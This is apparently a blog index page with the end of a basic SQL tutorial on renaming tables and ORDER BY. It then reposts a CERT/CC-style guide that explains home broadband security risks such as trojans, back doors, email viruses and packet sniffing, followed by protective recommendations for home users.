Purpose: This command is used to rename a table.

Syntax: Rename<table name> to <new table name>;

Example::
SQL>rename student2 to student;

SQL> select * from student;
  Command: Order by command

Purpose: The ORDER BY clause sorts the result set based on the columns specified.

Syntax: Order by<column name1>, <column name2> <[sort order]>;

Example::
SQL> select * from student2 order by roll_no asc;

SQL> select * from student2 order by s_no asc;

SQL> select * from student2 order by s_no desc;

Read More

Computer Network Security

Computer security click here to get free recharge on ur mobile

What is computer security?

Computer security is the process of preventing and detecting unauthorized use of your computer. Prevention measures help you to stop unauthorized users (also known as "intruders") from accessing any part of your computer system. Detection helps you to determine whether or not someone attempted to break into your system, if they were successful, and what they may have done.


Why should I care about computer security?

We use computers for everything from banking and investing to shopping and communicating with others through email or chat programs.  Although you may not consider your communications "top secret," you probably do not want strangers reading your email, using your computer to attack other systems, sending forged email from your computer, or examining personal information stored on your computer (such as financial statements).


Who would want to break into my computer at home?

Intruders (also referred to as hackers, attackers, or crackers) may not care about your identity. Often they want to gain control of your computer so they can use it to launch attacks on other computer systems.
Having control of your computer gives them the ability to hide their true location as they launch attacks, often against high-profile computer systems such as government or financial systems. Even if you have a computer connected to the Internet only to play the latest games or to send email to friends and family, your computer may be a target.
Intruders may be able to watch all your actions on the computer, or cause damage to your computer by reformatting your hard drive or changing your data.


How easy is it to break into my computer?

Unfortunately, intruders are always discovering new vulnerabilities (informally called "holes") to exploit in computer software. The complexity of software makes it increasingly difficult to thoroughly test the security of computer systems.
When holes are discovered, computer vendors will usually develop patches to address the problem(s). However, it is up to you, the user, to obtain and install the patches, or correctly configure the software to operate more securely. Most of the incident reports of computer break-ins received at the CERT/CC could have been prevented if system administrators and users kept their computers up-to-date with patches and security fixes.
Also, some software applications have default settings that allow other users to access your computer unless you change the settings to be more secure. Examples include chat programs that let outsiders execute commands on your computer or web browsers that could allow someone to place harmful programs on your computer that run when you click on them.

Technology

This section provides a basic introduction to the technologies that underlie the Internet. It was written with the novice end-user in mind and is not intended to be a comprehensive survey of all Internet-based technologies. Subsections provide a short overview of each topic. This section is a basic primer on the relevant technologies. For those who desire a deeper understanding of the concepts covered here, we include links to additional information.

What does broadband mean?

"Broadband" is the general term used to refer to high-speed network connections.  In this context, Internet connections via cable modem and Digital Subscriber Line (DSL) are frequently referred to as broadband Internet connections. "Bandwidth" is the term used to describe the relative speed of a network connection -- for example, most current dial-up modems can support a bandwidth of 56 kbps (thousand bits per second). There is no set bandwidth threshold required for a connection to be referred to as "broadband", but it is typical for connections in excess of 1 Megabit per second (Mbps) to be so named.


What is cable modem access?

A cable modem allows a single computer (or network of computers) to connect to the Internet via the cable TV network. The cable modem usually has an Ethernet LAN (Local Area Network) connection to the computer, and is capable of speeds in excess of 5 Mbps.
Typical speeds tend to be lower than the maximum, however, since cable providers turn entire neighborhoods into LANs which share the same bandwidth.  Because of this "shared-medium" topology, cable modem users may experience somewhat slower network access during periods of peak demand, and may be more susceptible to risks such as packet sniffing and unprotected windows shares than users with other types of connectivity. (See the "Computer security risks to home users" section of this document.)


What is DSL access?

Digital Subscriber Line (DSL) Internet connectivity, unlike cable modem-based service, provides the user with dedicated bandwidth. However, the maximum bandwidth available to DSL users is usually lower than the maximum cable modem rate because of differences in their respective network technologies. Also, the "dedicated bandwidth" is only dedicated between your home and the DSL provider's central office -- the providers offer little or no guarantee of bandwidth all the way across the Internet.
DSL access is not as susceptible to packet sniffing as cable modem access, but many of the other security risks we'll cover apply to both DSL and cable modem access. (See the "Computer security risks to home users" section of this document.)


How are broadband services different from traditional dial-up services?

Traditional dial-up Internet services are sometimes referred to as "dial-on-demand" services. That is, your computer only connects to the Internet when it has something to send, such as email or a request to load a web page. Once there is no more data to be sent, or after a certain amount of idle time, the computer disconnects the call. Also, in most cases each call connects to a pool of modems at the ISP, and since the modem IP addresses are dynamically assigned, your computer is usually assigned a different IP address on each call. As a result, it is more difficult (not impossible, just difficult) for an attacker to take advantage of vulnerable network services to take control of your computer.
Broadband services are referred to as "always-on" services because there is no call setup when your computer has something to send. The computer is always on the network, ready to send or receive data through its network interface card (NIC). Since the connection is always up, your computer’s IP address will change less frequently (if at all), thus making it more of a fixed target for attack.
What’s more, many broadband service providers use well-known IP addresses for home users. So while an attacker may not be able to single out your specific computer as belonging to you, they may at least be able to know that your service providers’ broadband customers are within a certain address range, thereby making your computer a more likely target than it might have been otherwise.
The table below shows a brief comparison of traditional dial-up and broadband services.



	Dial-up	Broadband
Connection type	Dial on demand	Always on
IP address	Changes on each call	Static or infrequently changing
Relative connection speed	Low	High
Remote control potential	Computer must be dialed in to control remotely	Computer is always connected, so remote control can occur anytime
ISP-provided security	Little or none	Little or none
Table 1: Comparison of Dial-up and Broadband Services




How is broadband access different from the network I use at work?

Corporate and government networks are typically protected by many layers of security, ranging from network firewalls to encryption. In addition, they usually have support staff who maintain the security and availability of these network connections.
Although your ISP is responsible for maintaining the services they provide to you, you probably won’t have dedicated staff on hand to manage and operate your home network. You are ultimately responsible for your own computers. As a result, it is up to you to take reasonable precautions to secure your computers from accidental or intentional misuse.


What is a protocol?

A protocol is a well-defined specification that allows computers to communicate across a network. In a way, protocols define the "grammar" that computers can use to "talk" to each other.


What is IP?

IP stands for "Internet Protocol". It can be thought of as the common language of computers on the Internet. There are a number of detailed descriptions of IP given elsewhere, so we won't cover it in detail in this document. However, it is important to know a few things about IP in order to understand how to secure your computer. Here we’ll cover IP addresses, static vs. dynamic addressing, NAT, and TCP and UDP Ports.
An overview of TCP/IP can be found in the TCP/IP Frequently Asked Questions (FAQ) at


http://www.faqs.org/faqs/internet/tcp-ip/tcp-ip-faq/part1/

and


http://www.faqs.org/faqs/internet/tcp-ip/tcp-ip-faq/part2/

What is an IP address?

IP addresses are analogous to telephone numbers – when you want to call someone on the telephone, you must first know their telephone number. Similarly, when a computer on the Internet needs to send data to another computer, it must first know its IP address. IP addresses are typically shown as four numbers separated by decimal points, or “dots”. For example, 10.24.254.3 and 192.168.62.231 are IP addresses.
If you need to make a telephone call but you only know the person’s name, you can look them up in the telephone directory (or call directory services) to get their telephone number. On the Internet, that directory is called the Domain Name System, or DNS for short. If you know the name of a server, say www.cert.org, and you type this into your web browser, your computer will then go ask its DNS server what the numeric IP address is that is associated with that name.
Every computer on the Internet has an IP address associated with it that uniquely identifies it. However, that address may change over time, especially if the computer is

• dialing into an Internet Service Provider (ISP)
• connected behind a network firewall
• connected to a broadband service using dynamic IP addressing.

What are static and dynamic addressing?

Static IP addressing occurs when an ISP permanently assigns one or more IP addresses for each user. These addresses do not change over time. However, if a static address is assigned but not in use, it is effectively wasted. Since ISPs have a limited number of addresses allocated to them, they sometimes need to make more efficient use of their addresses.
Dynamic IP addressing allows the ISP to efficiently utilize their address space. Using dynamic IP addressing, the IP addresses of individual user computers may change over time. If a dynamic address is not in use, it can be automatically reassigned to another computer as needed.


What is NAT?

Network Address Translation (NAT) provides a way to hide the IP addresses of a private network from the Internet while still allowing computers on that network to access the Internet. NAT can be used in many different ways, but one method frequently used by home users is called "masquerading".
Using NAT masquerading, one or more devices on a LAN can be made to appear as a single IP address to the outside Internet. This allows for multiple computers in a home network to use a single cable modem or DSL connection without requiring the ISP to provide more than one IP address to the user. Using this method, the ISP-assigned IP address can be either static or dynamic. Most network firewalls support NAT masquerading.


What are TCP and UDP Ports?

TCP (Transmission Control Protocol) and UDP (User Datagram Protocol) are both protocols that use IP. Whereas IP allows two computers to talk to each other across the Internet, TCP and UDP allow individual applications (also known as "services") on those computers to talk to each other.
In the same way that a telephone number or physical mail box might be associated with more than one person, a computer might have multiple applications (e.g. email, file services, web services) running on the same IP address. Ports allow a computer to differentiate services such as email data from web data. A port is simply a number associated with each application that uniquely identifies that service on that computer. Both TCP and UDP use ports to identify services. Some common port numbers are 80 for web (HTTP), 25 for email (SMTP), and 53 for Dmain Name System (DNS).


What is a firewall?

The Firewalls FAQ (http://www.faqs.org/faqs/firewalls-faq/) defines a firewall as "a system or group of systems that enforces an access control policy between two networks." In the context of home networks, a firewall typically takes one of two forms:

• Software firewall - specialized software running on an individual computer, or
• Network firewall - a dedicated device designed to protect one or more computers.
Both types of firewall allow the user to define access policies for inbound connections to the computers they are protecting. Many also provide the ability to control what services (ports) the protected computers are able to access on the Internet (outbound access). Most firewalls intended for home use come with pre-configured security policies from which the user chooses, and some allow the user to customize these policies for their specific needs.
More information on firewalls can be found in the Additional resources section of this document.


What does antivirus software do?

There are a variety of antivirus software packages that operate in many different ways, depending on how the vendor chose to implement their software. What they have in common, though, is that they all look for patterns in the files or memory of your computer that indicate the possible presence of a known virus. Antivirus packages know what to look for through the use of virus profiles (sometimes called "signatures") provided by the vendor.
New viruses are discovered daily. The effectiveness of antivirus software is dependent on having the latest virus profiles installed on your computer so that it can look for recently discovered viruses. It is important to keep these profiles up to date.

Computer security risks to home users

What is at risk?

Information security is concerned with three main areas:

• Confidentiality - information should be available only to those who rightfully have access to it
• Integrity -- information should be modified only by those who are authorized to do so
• Availability -- information should be accessible to those who need it when they need it
These concepts apply to home Internet users just as much as they would to any corporate or government network. You probably wouldn't let a stranger look through your important documents. In the same way, you may want to keep the tasks you perform on your computer confidential, whether it's tracking your investments or sending email messages to family and friends. Also, you should have some assurance that the information you enter into your computer remains intact and is available when you need it.
Some security risks arise from the possibility of intentional misuse of your computer by intruders via the Internet. Others are risks that you would face even if you weren't connected to the Internet (e.g. hard disk failures, theft, power outages). The bad news is that you probably cannot plan for every possible risk. The good news is that you can take some simple steps to reduce the chance that you'll be affected by the most common threats -- and some of those steps help with both the intentional and accidental risks you're likely to face.
Before we get to what you can do to protect your computer or home network, let’s take a closer look at some of these risks.


Intentional misuse of your computer

The most common methods used by intruders to gain control of home computers are briefly described below. More detailed information is available by reviewing the URLs listed in the References section below.

1. Trojan horse programs
2. Back door and remote administration programs
3. Denial of service
4. Being an intermediary for another attack
5. Unprotected Windows shares
6. Mobile code (Java, JavaScript, and ActiveX)
7. Cross-site scripting
8. Email spoofing
9. Email-borne viruses
10. Hidden file extensions
11. Chat clients
12. Packet sniffing

Trojan horse programs

Trojan horse programs are a common way for intruders to trick you (sometimes referred to as "social engineering") into installing "back door" programs. These can allow intruders easy access to your computer without your knowledge, change your system configurations, or infect your computer with a computer virus. More information about Trojan horses can be found in the following document.


http://www.cert.org/advisories/CA-1999-02.html

Back door and remote administration programs

On Windows computers, three tools commonly used by intruders to gain remote access to your computer are BackOrifice, Netbus, and SubSeven. These back door or remote administration programs, once installed, allow other people to access and control your computer.


Denial of service

Another form of attack is called a denial-of-service (DoS) attack. This type of attack causes your computer to crash or to become so busy processing data that you are unable to use it. In most cases, the latest patches will prevent the attack. The following documents describe denial-of-service attacks in greater detail.


http://www.cert.org/advisories/CA-2000-01.html

http://www.cert.org/archive/pdf/DoS_trends.pdf

It is important to note that in addition to being the target of a DoS attack, it is possible for your computer to be used as a participant in a denial-of-service attack on another system.


Being an intermediary for another attack

Intruders will frequently use compromised computers as launching pads for attacking other systems. An example of this is how distributed denial-of-service (DDoS) tools are used. The intruders install an "agent" (frequently through a Trojan horse program) that runs on the compromised computer awaiting further instructions. Then, when a number of agents are running on different computers, a single "handler" can instruct all of them to launch a denial-of-service attack on another system. Thus, the end target of the attack is not your own computer, but someone else’s -- your computer is just a convenient tool in a larger attack.


Unprotected Windows shares

Unprotected Windows networking shares can be exploited by intruders in an automated way to place tools on large numbers of Windows-based computers attached to the Internet. Because site security on the Internet is interdependent, a compromised computer not only creates problems for the computer's owner, but it is also a threat to other sites on the Internet. The greater immediate risk to the Internet community is the potentially large number of computers attached to the Internet with unprotected Windows networking shares combined with distributed attack tools such as those described in


http://www.cert.org/incident_notes/IN-2000-01.html

Another threat includes malicious and destructive code, such as viruses or worms, which leverage unprotected Windows networking shares to propagate. One such example is the 911 worm described in


http://www.cert.org/incident_notes/IN-2000-03.html

There is great potential for the emergence of other intruder tools that leverage unprotected Windows networking shares on a widespread basis.


Mobile code (Java/JavaScript/ActiveX)

There have been reports of problems with "mobile code" (e.g. Java, JavaScript, and ActiveX). These are programming languages that let web developers write code that is executed by your web browser. Although the code is generally useful, it can be used by intruders to gather information (such as which web sites you visit) or to run malicious code on your computer. It is possible to disable Java, JavaScript, and ActiveX in your web browser. We recommend that you do so if you are browsing web sites that you are not familiar with or do not trust.
Also be aware of the risks involved in the use of mobile code within email programs. Many email programs use the same code as web browsers to display HTML. Thus, vulnerabilities that affect Java, JavaScript, and ActiveX are often applicable to email as well as web pages.
More information on ActiveX security is available in http://www.cert.org/archive/pdf/activeX_report.pdf


Cross-site scripting

A malicious web developer may attach a script to something sent to a web site, such as a URL, an element in a form, or a database inquiry. Later, when the web site responds to you, the malicious script is transferred to your browser.
You can potentially expose your web browser to malicious scripts by

• following links in web pages, email messages, or newsgroup postings without knowing what they link to
• using interactive forms on an untrustworthy site
• viewing online discussion groups, forums, or other dynamically generated pages where users can post text containing HTML tags
More information regarding the risks posed by malicious code in web links can be found in CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests.


Email spoofing

Email “spoofing” is when an email message appears to have originated from one source when it actually was sent from another source. Email spoofing is often an attempt to trick the user into making a damaging statement or releasing sensitive information (such as passwords).
Spoofed email can range from harmless pranks to social engineering ploys. Examples of the latter include

• email claiming to be from a system administrator requesting users to change their passwords to a specified string and threatening to suspend their account if they do not comply
• email claiming to be from a person in authority requesting users to send them a copy of a password file or other sensitive information
Note that while service providers may occasionally request that you change your password, they usually will not specify what you should change it to. Also, most legitimate service providers would never ask you to send them any password information via email. If you suspect that you may have received a spoofed email from someone with malicious intent, you should contact your service provider's support personnel immediately.


Email borne viruses

Viruses and other types of malicious code are often spread as attachments to email messages. Before opening any attachments, be sure you know the source of the attachment. It is not enough that the mail originated from an address you recognize. The Melissa virus (see References) spread precisely because it originated from a familiar address. Also, malicious code might be distributed in amusing or enticing programs.
Many recent viruses use these social engineering techniques to spread. Examples include

• W32/Sircam -- http://www.cert.org/advisories/CA-2001-22.html
• W32/Goner -- http://www.cert.org/incident_notes/IN-2001-15.html
Never run a program unless you know it to be authored by a person or company that you trust. Also, don't send programs of unknown origin to your friends or coworkers simply because they are amusing -- they might contain a Trojan horse program.


Hidden file extensions

Windows operating systems contain an option to "Hide file extensions for known file types". The option is enabled by default, but a user may choose to disable this option in order to have file extensions displayed by Windows. Multiple email-borne viruses are known to exploit hidden file extensions. The first major attack that took advantage of a hidden file extension was the VBS/LoveLetter worm which contained an email attachment named "LOVE-LETTER-FOR-YOU.TXT.vbs". Other malicious programs have since incorporated similar naming schemes. Examples include

• Downloader (MySis.avi.exe or QuickFlick.mpg.exe)
• VBS/Timofonica (TIMOFONICA.TXT.vbs)
• VBS/CoolNote (COOL_NOTEPAD_DEMO.TXT.vbs)
• VBS/OnTheFly (AnnaKournikova.jpg.vbs)
The files attached to the email messages sent by these viruses may appear to be harmless text (.txt), MPEG (.mpg), AVI (.avi) or other file types when in fact the file is a malicious script or executable (.vbs or .exe, for example).


Chat clients

Internet chat applications, such as instant messaging applications and Internet Relay Chat (IRC) networks, provide a mechanism for information to be transmitted bi-directionally between computers on the Internet. Chat clients provide groups of individuals with the means to exchange dialog, web URLs, and in many cases, files of any type.
Because many chat clients allow for the exchange of executable code, they present risks similar to those of email clients. As with email clients, care should be taken to limit the chat client’s ability to execute downloaded files. As always, you should be wary of exchanging files with unknown parties.


Packet sniffing

A packet sniffer is a program that captures data from information packets as they travel over the network. That data may include user names, passwords, and proprietary information that travels over the network in clear text. With perhaps hundreds or thousands of passwords captured by the packet sniffer, intruders can launch widespread attacks on systems. Installing a packet sniffer does not necessarily require administrator-level access.
Relative to DSL and traditional dial-up users, cable modem users have a higher risk of exposure to packet sniffers since entire neighborhoods of cable modem users are effectively part of the same LAN. A packet sniffer installed on any cable modem user's computer in a neighborhood may be able to capture data transmitted by any other cable modem in the same neighborhood.

Accidents and other risks

In addition to the risks associated with connecting your computer to the Internet, there are a number of risks that apply even if the computer has no network connections at all. Most of these risks are well-known, so we won’t go into much detail in this document, but it is important to note that the common practices associated with reducing these risks may also help reduce susceptibility to the network-based risks discussed above.


Disk failure

Recall that availability is one of the three key elements of information security. Although all stored data can become unavailable -- if the media it’s stored on is physically damaged, destroyed, or lost -- data stored on hard disks is at higher risk due to the mechanical nature of the device. Hard disk crashes are a common cause of data loss on personal computers. Regular system backups are the only effective remedy.


Power failure and surges

Power problems (surges, blackouts, and brown-outs) can cause physical damage to a computer, inducing a hard disk crash or otherwise harming the electronic components of the computer. Common mitigation methods include using surge suppressors and uninterruptible power supplies (UPS).


Physical Theft

Physical theft of a computer, of course, results in the loss of confidentiality and availability, and (assuming the computer is ever recovered) makes the integrity of the data stored on the disk suspect. Regular system backups (with the backups stored somewhere away from the computer) allow for recovery of the data, but backups alone cannot address confidentiality. Cryptographic tools are available that can encrypt data stored on a computer’s hard disk. The CERT/CC encourages the use of these tools if the computer contains sensitive data or is at high risk of theft (e.g. laptops or other portable computers).

Actions home users can take to protect their computer systems

The CERT/CC recommends the following practices to home users:

1. Consult your system support personnel if you work from home
2. Use virus protection software
3. Use a firewall
4. Don’t open unknown email attachments
5. Don’t run programs of unknown origin
6. Disable hidden filename extensions
7. Keep all applications (including your operating system) patched
8. Turn off your computer or disconnect from the network when not in use
9. Disable Java, JavaScript, and ActiveX if possible
10. Disable scripting features in email programs
11. Make regular backups of critical data
12. Make a boot disk in case your computer is damaged or compromised

Further discussion on each of these points is given below.

Recommendations

Consult your system support personnel if you work from home

If you use your broadband access to connect to your employer's network via a Virtual Private Network (VPN) or other means, your employer may have policies or procedures relating to the security of your home network. Be sure to consult with your employer's support personnel, as appropriate, before following any of the steps outlined in this document.


Use virus protection software

The CERT/CC recommends the use of anti-virus software on all Internet-connected computers. Be sure to keep your anti-virus software up-to-date. Many anti-virus packages support automatic updates of virus definitions. We recommend the use of these automatic updates when available.


Use a firewall

We strongly recommend the use of some type of firewall product, such as a network appliance or a personal firewall software package. Intruders are constantly scanning home user systems for known vulnerabilities. Network firewalls (whether software or hardware-based) can provide some degree of protection against these attacks. However, no firewall can detect or stop all attacks, so it’s not sufficient to install a firewall and then ignore all other security measures.


Don't open unknown email attachments

Before opening any email attachments, be sure you know the source of the attachment. It is not enough that the mail originated from an address you recognize. The Melissa virus spread precisely because it originated from a familiar address. Malicious code might be distributed in amusing or enticing programs.
If you must open an attachment before you can verify the source, we suggest the following procedure:

1. be sure your virus definitions are up-to-date (see "Use virus protection software" above)
2. save the file to your hard disk
3. scan the file using your antivirus software
4. open the file
For additional protection, you can disconnect your computer's network connection before opening the file.
Following these steps will reduce, but not wholly eliminate, the chance that any malicious code contained in the attachment might spread from your computer to others.


Don't run programs of unknown origin

Never run a program unless you know it to be authored by a person or company that you trust. Also, don't send programs of unknown origin to your friends or coworkers simply because they are amusing -- they might contain a Trojan horse program.


Disable hidden filename extensions

Windows operating systems contain an option to "Hide file extensions for known file types". The option is enabled by default, but you can disable this option in order to have file extensions displayed by Windows. After disabling this option, there are still some file extensions that, by default, will continue to remain hidden.
There is a registry value which, if set, will cause Windows to hide certain file extensions regardless of user configuration choices elsewhere in the operating system. The "NeverShowExt" registry value is used to hide the extensions for basic Windows file types. For example, the ".LNK" extension associated with Windows shortcuts remains hidden even after a user has turned off the option to hide extensions.
Specific instructions for disabling hidden file name extensions are given in http://www.cert.org/incident_notes/IN-2000-07.html


Keep all applications, including your operating system, patched

Vendors will usually release patches for their software when a vulnerability has been discovered. Most product documentation offers a method to get updates and patches. You should be able to obtain updates from the vendor's web site. Read the manuals or browse the vendor's web site for more information.
Some applications will automatically check for available updates, and many vendors offer automatic notification of updates via a mailing list. Look on your vendor's web site for information about automatic notification. If no mailing list or other automated notification mechanism is offered you may need to check periodically for updates.


Turn off your computer or disconnect from the network when not in use

Turn off your computer or disconnect its Ethernet interface when you are not using it. An intruder cannot attack your computer if it is powered off or otherwise completely disconnected from the network.


Disable Java, JavaScript, and ActiveX if possible

Be aware of the risks involved in the use of "mobile code" such as ActiveX, Java, and JavaScript. A malicious web developer may attach a script to something sent to a web site, such as a URL, an element in a form, or a database inquiry. Later, when the web site responds to you, the malicious script is transferred to your browser.
The most significant impact of this vulnerability can be avoided by disabling all scripting languages. Turning off these options will keep you from being vulnerable to malicious scripts. However, it will limit the interaction you can have with some web sites.
Many legitimate sites use scripts running within the browser to add useful features. Disabling scripting may degrade the functionality of these sites.
More information on ActiveX security, including recommendations for users who administer their own computers, is available in http://www.cert.org/archive/pdf/activeX_report.pdf
More information regarding the risks posed by malicious code in web links can be found in CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests.


Disable scripting features in email programs

Because many email programs use the same code as web browsers to display HTML, vulnerabilities that affect ActiveX, Java, and JavaScript are often applicable to email as well as web pages. Therefore, in addition to disabling scripting features in web browsers (see "Disable Java, JavaScript, and ActiveX if possible", above), we recommend that users also disable these features in their email programs.


Make regular backups of critical data

Keep a copy of important files on removable media such as ZIP disks or recordable CD-ROM disks (CD-R or CD-RW disks). Use software backup tools if available, and store the backup disks somewhere away from the computer.


Make a boot disk in case your computer is damaged or compromised

To aid in recovering from a security breach or hard disk failure, create a boot disk on a floppy disk which will help when recovering a computer after such an event has occurred. Remember, however, you must create this disk before you have a security event.

 

Read More